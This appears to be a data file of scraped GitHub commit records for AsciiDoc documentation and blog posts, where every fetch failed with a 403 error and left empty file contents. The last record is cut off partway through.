{"commit":"46d0fea0ca12dcf07a21b5df5250555ecbf11264","subject":"Create FP.adoc","message":"Create FP.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"FP.adoc","new_file":"FP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"6bcadaf593ca7f12f83bc5009d996bef520ce492","subject":"common-training snippet","message":"common-training snippet","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-training.adoc","new_file":"src\/main\/docs\/common-training.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bd6c520a9f1d3e1ae085bbc8f1e57f87f491fcc","subject":"Update 2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","message":"Update 2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5004e8d05e6ee4379d679c2e110c663832b88cbc","subject":"Update 2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","message":"Update 2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","new_file":"_posts\/2017-06-20-Episode-104-Dessert-Fries-Blah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"beb77302be4a4b02385613a67abe27e7e14fb870","subject":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","message":"Publish 04-06-2015-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_file":"04-06-2015-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cda07be91bdb9ea537dc19768db54fd345ce7bf0","subject":"release notes: update_dirs and fs_metadata_dir","message":"release notes: update_dirs and fs_metadata_dir\n\nThis patch adds release notes for support of data dir removal via the\n`kudu fs update_dirs` tool and for the configuration of the metadata\ndirectory.\n\nNote: These blurbs are taken from the configuration docs.\n\nChange-Id: I87f0857c3e7d9d98865fbb50e5e69b78e03c6fe2\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9581\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nTested-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7093392cd30ed03babb0ee5a6e009ef912b4f6a6","subject":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","message":"Publish 2016-6-28-PHPER-authority-control-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_file":"2016-6-28-PHPER-authority-control-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4664e7ddebd72d9c8cdadd0a7de1bb6468a16160","subject":"Update 2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","message":"Update 2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","new_file":"_posts\/2013-06-09-Code-As-You-Would-Order-A-Burger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32010405f052497a1d7bfa73b5ef03ce99ce50e3","subject":"Adds README.adoc","message":"Adds README.adoc\n\nAdds README.adoc with information on how to use Arquillian Cube.","repos":"spolti\/arquillian-cube,spolti\/arquillian-cube,AndyGee\/arquillian-cube,AndyGee\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube,AndyGee\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,mikesir87\/arquillian-cube,lordofthejars\/arquillian-cube,spolti\/arquillian-cube","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spolti\/arquillian-cube.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d78415bb34d35f009e1f5bbafbc00c6b10824c13","subject":"Update README","message":"Update README\n\nAdd a reference to hachoir.\n","repos":"pjanouch\/hex","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/hex.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"3c6ea9928e54f764d4026cf8456edb78b43a5af6","subject":"docs: Fix gitter link","message":"docs: Fix gitter link\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"837f92995a1ea95d6319d9b5c1d472ed0528b3c9","subject":"Add readme","message":"Add readme\n","repos":"snoopee\/snoopee.github.io,snoopee\/snoopee.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snoopee\/snoopee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76cd5781f1c3c9c7837c72ed8a71e6fac79be7a3","subject":"job: #12050 added implementation note","message":"job: #12050 added implementation note\n","repos":"cortlandstarrett\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/11444_wasl\/12050_type_order_int.adoc","new_file":"doc\/notes\/11444_wasl\/12050_type_order_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6410d9c7915d64c6f0a862ed921cca16bb836673","subject":"[#18103] Add guide for Hibernate Reactive","message":"[#18103] Add guide for Hibernate Reactive\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-reactive.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-reactive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"32e6fcf2568ac800fa692b4b54217e63d4b81b50","subject":"Fix markup in Zen discovery docs","message":"Fix markup in Zen discovery docs\n\nThis commit fixes a markup issue in the Zen discovery docs where a link\nand its referring text were not on the same line tripping the renderer.\n","repos":"brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,strapdata\/elassandra,C-Bish\/elasticsearch,i-am-Nathan\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,winstonewert\/elasticsearch,scorpionvicky\/elasticsearch,mortonsykes\/elasticsearch,i-am-Nathan\/elasticsearch,Shepard1212\/elasticsearch,winstonewert\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,jprante\/elasticsearch,LeoYao\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,IanvsPoplicola\/elasticsearch,henakamaMSFT\/elasticsearch,geidies\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,IanvsPoplicola\/elasticsearch,JackyMai\/elasticsearch,wuranbo\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,qwerty4030\/elasticsearch,JSCooke\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,spiegela\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra,njlawton\/elasticsearch,brandonkearby\/elasticsearch,fernandozhu\/elasticsearch,mjason3\/elasticsearch,rajanm\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,elasticdog\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,IanvsPoplicola\/elasticsearch,alexshadow007\/elasticsearch,naveenhooda2000\/elasticsearch,ZTE-PaaS\/elasticsearch,brandonkearby\/elasticsearch,MaineC\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,spiegela\/elasticsearch,njlawton\/elasticsearch,i-am-Nathan\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,henakamaMSFT\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JackyMai\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,MisterAndersen\/elasticsearch,lks21c\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,Helen-Zhao\/elasticsearch,wuranbo\/elasticsearch,wuranbo\/elasticsearch,GlenRSmith\/elasticsearch,LeoYao\/elasticsearch,winstonewert\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,GlenRSmith\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,henakamaMSFT\/elasticsearch,naveenhooda2000\/elasticsearch,IanvsPoplicola\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,strapdata\/elassandra,nezirus\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,geidies\/elasticsearch,LewayneNaidoo\/elasticsearch,wangtuo\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,mohit\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,IanvsPoplicola\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,vroyer\/elasticassandra,fforbeck\/elasticsearch,gingerwizard\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,rajanm\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,winstonewert\/elasticsearch,strapdata\/elassandra,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,rlugojr\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,StefanGor\/elasticsearch,umeshdangat\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,spiegela\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,glefloch\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,Stacey-Gammon\/elasticsearch,Shepard1212\/elasticsearch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,nazarewk\/elasticsearch,shreejay\/elasticsearch,Shepard1212\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,glefloch\/elasticsearch,fforbeck\/elasticsearch,nknize\/elasticsearch,artnowo\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elasticassandra,fernandozhu\/elasticsearch,Helen-Zhao\/elasticsearch,C-Bish\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,jprante\/elasticsearch,wangtuo\/elasticsearch,bawse\/elasticsearch,nilabhsagar\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,coding0011\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,mjason3\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,bawse\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,StefanGor\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch,StefanGor\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,LewayneNaidoo\/elasticsearch,obourgain\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,mjason3\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,artnowo\/elasticsearch","old_file":"docs\/reference\/modules\/discovery\/zen.asciidoc","new_file":"docs\/reference\/modules\/discovery\/zen.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a82187ac32d6d1c5ed2bef9c33b66bf0d5cfcee","subject":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","message":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9d2d79b82b319a378a1ae7090c5107844386749","subject":"Create New article","message":"Create New article\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"260bef8fe0ca2bf6ae7504524f7ebe02c8526ef5","subject":"Update 2016-01-01-2016-The-Goldern-year.adoc","message":"Update 2016-01-01-2016-The-Goldern-year.adoc","repos":"JacobSamro\/blog,JacobSamro\/blog,JacobSamro\/blog","old_file":"_posts\/2016-01-01-2016-The-Goldern-year.adoc","new_file":"_posts\/2016-01-01-2016-The-Goldern-year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JacobSamro\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46b8ccac8588bee63e29d31d2d2733ee26190e8a","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f43d51fc7bac1191ffbba2dee4f555638d4c364","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34e21fe9859f9e1faa6b8ce9c397b57b8c07b304","subject":"Update 2016-06-11-Main-Title-Subtitle.adoc","message":"Update 2016-06-11-Main-Title-Subtitle.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_file":"_posts\/2016-06-11-Main-Title-Subtitle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"163e13f94b0376ef5ebaf8381a360ac20a81844e","subject":"add tools.build guide","message":"add tools.build guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/build.adoc","new_file":"content\/guides\/build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5f737fdc2fc5125bb8c59836939fa6592f806e33","subject":"Update 2015-06-12-JS-ES6-classes.adoc","message":"Update 2015-06-12-JS-ES6-classes.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-12-JS-ES6-classes.adoc","new_file":"_posts\/2015-06-12-JS-ES6-classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5090ab0e700fc1b22cfed20bf4615e16958a4c2","subject":"Added Otherwise EIP docs","message":"Added Otherwise EIP docs\n","repos":"CodeSmell\/camel,gautric\/camel,objectiser\/camel,jamesnetherton\/camel,davidkarlsen\/camel,dmvolod\/camel,anoordover\/camel,anoordover\/camel,kevinearls\/camel,objectiser\/camel,jamesnetherton\/camel,adessaigne\/camel,tadayosi\/camel,tdiesler\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,gautric\/camel,tdiesler\/camel,cunningt\/camel,nicolaferraro\/camel,objectiser\/camel,tadayosi\/camel,gnodet\/camel,curso007\/camel,nicolaferraro\/camel,dmvolod\/camel,gautric\/camel,akhettar\/camel,onders86\/camel,kevinearls\/camel,mcollovati\/camel,kevinearls\/camel,sverkera\/camel,kevinearls\/camel,onders86\/camel,gautric\/camel,dmvolod\/camel,zregvart\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,zregvart\/camel,christophd\/camel,sverkera\/camel,jonmcewen\/camel,tdiesler\/camel,anoordover\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,adessaigne\/camel,jonmcewen\/camel,christophd\/camel,punkhorn\/camel-upstream,tadayosi\/camel,CodeSmell\/camel,pmoerenhout\/camel,DariusX\/camel,snurmine\/camel,cunningt\/camel,kevinearls\/camel,akhettar\/camel,apache\/camel,mcollovati\/camel,DariusX\/camel,apache\/camel,gautric\/camel,adessaigne\/camel,CodeSmell\/camel,adessaigne\/camel,tadayosi\/camel,jonmcewen\/camel,akhettar\/camel,akhettar\/camel,sverkera\/camel,pmoerenhout\/camel,onders86\/camel,davidkarlsen\/camel,DariusX\/camel,adessaigne\/camel,sverkera\/camel,dmvolod\/camel,curso007\/camel,DariusX\/camel,dmvolod\/camel,jamesnetherton\/camel,alvinkwekel\/camel,curso007\/camel,pax95\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,ullgren\/camel,gnodet\/camel,snurmine\/camel,ullgren\/camel,pax95\/camel,jonmcewen\/camel,cunningt\/camel,tdiesler\/camel,ullgren\/camel,sverkera\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tdiesler\/camel,akhettar\/camel,kevinearls\/camel,curso007\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,curso007\/camel,pmoerenhout\/camel,jonmcewen\/camel,ullgren\/camel,anoordover\/camel,curso007\/camel,objectiser\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,davidkarlsen\/camel,mcollovati\/camel,snurmine\/camel,pax95\/camel,onders86\/camel,snurmine\/camel,tadayosi\/camel,onders86\/camel,dmvolod\/camel,jamesnetherton\/camel,onders86\/camel,gnodet\/camel,christophd\/camel,adessaigne\/camel,pmoerenhout\/camel,tdiesler\/camel,snurmine\/camel,tadayosi\/camel,CodeSmell\/camel,nikhilvibhav\/camel,jonmcewen\/camel,pax95\/camel,gautric\/camel,apache\/camel,Fabryprog\/camel,snurmine\/camel,zregvart\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,cunningt\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,gnodet\/camel,pmoerenhout\/camel,cunningt\/camel,sverkera\/camel,jamesnetherton\/camel,christophd\/camel,zregvart\/camel,pmoerenhout\/camel,nicolaferraro\/camel,mcollovati\/camel,anoordover\/camel,Fabryprog\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/otherwise-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/otherwise-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"902fc519570fe588993792efae6e54275f7f2bcc","subject":"Update 2014-08-14-Episode-10-Pinball-Galore.adoc","message":"Update 